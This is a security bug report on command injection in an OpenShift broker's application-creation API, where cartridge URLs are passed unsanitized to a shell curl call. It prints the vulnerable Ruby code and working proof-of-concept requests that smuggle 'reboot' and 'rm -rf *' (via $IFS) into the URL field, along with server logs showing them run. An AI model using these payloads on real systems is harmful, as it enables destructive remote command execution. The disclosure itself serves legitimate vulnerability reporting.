Jeremy Choi (jechoi) reports: Description of problem: By further research, I managed to exploit the API to create applications via cartridge urls to perform command injection attacks. See actual results below. While some changes have been applied to address the issue in bug #958928 earlier, it is now found to be still vulnerable. After the changes, url has started to be checked by URI.parse(url) and it would run in ` form in accordance with the result of URI.parse() uri_obj = URI.parse(url) if uri_obj.kind_of? URI::HTTP or uri_obj.kind_of? URI::FTP manifest = `curl --max-time #{max_dl_time} --connect-timeout 2 --location --max-redirs #{max_redirs} --max-filesize #{max_file_size} -k #{url}` end However, since URI.parse() allows ';' to be passed, commands can be injected if appended to the end of valid uri such as http://poc.com/;reboot $ curl -k -s -H "Content-Type: application/json" -u jechoi:pw https://ec2-54-224-22-184.compute-1.amazonaws.com/broker/rest/domains/domtest/applications -X POST -d '{"name":"app4","cartridge":{"url":"http://poc.com/;reboot"}}' {"data":null,"errors":{},"messages":[{"exit_code":109,"field":null,"severity":"error","text":"Invalid cartridge, error downloading from url 'http://poc.com/;reboot' "}],"status":"unprocessable_entity","supported_api_versions":[1.0,1.1,1.2,1.3,1.4],"type":null,"version":"1.4"} It appears that error is returned, but the injected command is actully run. # tail /var/log/openshift/broker/httpd/error_log ... reboot: Need to be root Further, since URI.parse also allows '$', some commands which need arguements can be also injected using $IFS. See the result of injection of 'rm -rf *' $ curl -k -s -H "Content-Type: application/json" -u jechoi:pw https://ec2-54-224-22-184.compute-1.amazonaws.com/broker/rest/domains/domtest/applications -X POST -d '{"name":"app4","cartridge":{"url":"http://poc.com/;rm$IFS-rf$IFS*"}}' # tail /var/log/openshift/broker/httpd/error_log rm: cannot remove `test/unit/nurture_test.rb': Permission denied rm: cannot remove `test/unit/cloud_user_test.rb': Permission denied rm: cannot remove `test/unit/cartridge_rates_test.rb': Permission denied rm: cannot remove `test/system/app_cartridge_events_test.rb': Permission denied